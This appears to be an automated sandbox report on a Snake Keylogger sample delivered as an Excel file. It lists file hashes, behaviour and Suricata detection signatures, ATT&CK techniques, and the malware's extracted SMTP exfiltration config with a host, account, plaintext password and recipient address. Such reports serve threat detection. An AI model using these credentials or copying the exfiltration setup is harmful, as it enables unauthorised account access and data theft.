General

  • Target

    88160011B.xlsx

  • Size

    39KB

  • Sample

    220705-phvnhsahh2

  • MD5

    bb45f31acbfa03dcf30c1ef037a607e2

  • SHA1

    4539a5f55990c8490f39d0724e372ba66bdbf903

  • SHA256

    4da0fa732b3cb2b77f92db9ed169eae7606d5646aa38dbaf9667565556b3e223

  • SHA512

    5290df186c6312a68bb81429a19bb8eee06b71bdbe5b9d7e1ebc4ceca87ef7021d463b2a38f1e9388859fc63a6bd112e6f3f358ff251f0ffdae8e9ffd420bf62

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.stilltech.ro
  • Port:
    587
  • Username:
    office@stilltech.ro
  • Password:
    eurobit555ro
  • Email To:
    graceunlimited153@gmail.com

Targets

    • Target

      88160011B.xlsx

    • Size

      39KB

    • MD5

      bb45f31acbfa03dcf30c1ef037a607e2

    • SHA1

      4539a5f55990c8490f39d0724e372ba66bdbf903

    • SHA256

      4da0fa732b3cb2b77f92db9ed169eae7606d5646aa38dbaf9667565556b3e223

    • SHA512

      5290df186c6312a68bb81429a19bb8eee06b71bdbe5b9d7e1ebc4ceca87ef7021d463b2a38f1e9388859fc63a6bd112e6f3f358ff251f0ffdae8e9ffd420bf62

    • Snake Keylogger

      Keylogger and Infostealer first seen in November 2020.

    • Snake Keylogger Payload

    • suricata: ET MALWARE MSIL/GenKryptik.FQRH Download Request

      suricata: ET MALWARE MSIL/GenKryptik.FQRH Download Request

    • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

      suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Abuses OpenXML format to download file from external location

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      decrypted

    • Size

      35KB

    • MD5

      3910d5d3b292f25def60bb76fbf17f9a

    • SHA1

      0f0fbab3541b7f82cf95f207293a5c0e1935f115

    • SHA256

      1edcbce9fb67ee7b09caf7a75f2f5d55ef61e3238d265b1e25fa78b8aaeb30e5

    • SHA512

      dc800cbbfedf12c57128e198c9b0d662dc680cda47159753e79914d688c7de7b177d9fc9c95b46afd9379edb2976ccb538e1c6d813e99f80c51595388e03c931

    • Snake Keylogger

      Keylogger and Infostealer first seen in November 2020.

    • Snake Keylogger Payload

    • suricata: ET MALWARE MSIL/GenKryptik.FQRH Download Request

      suricata: ET MALWARE MSIL/GenKryptik.FQRH Download Request

    • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

      suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Abuses OpenXML format to download file from external location

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

2
T1064

Exploitation for Client Execution

2
T1203

Defense Evasion

Scripting

2
T1064

Modify Registry

2
T1112

Discovery

Query Registry

4
T1012

System Information Discovery

4
T1082

Collection

Email Collection

2
T1114

Tasks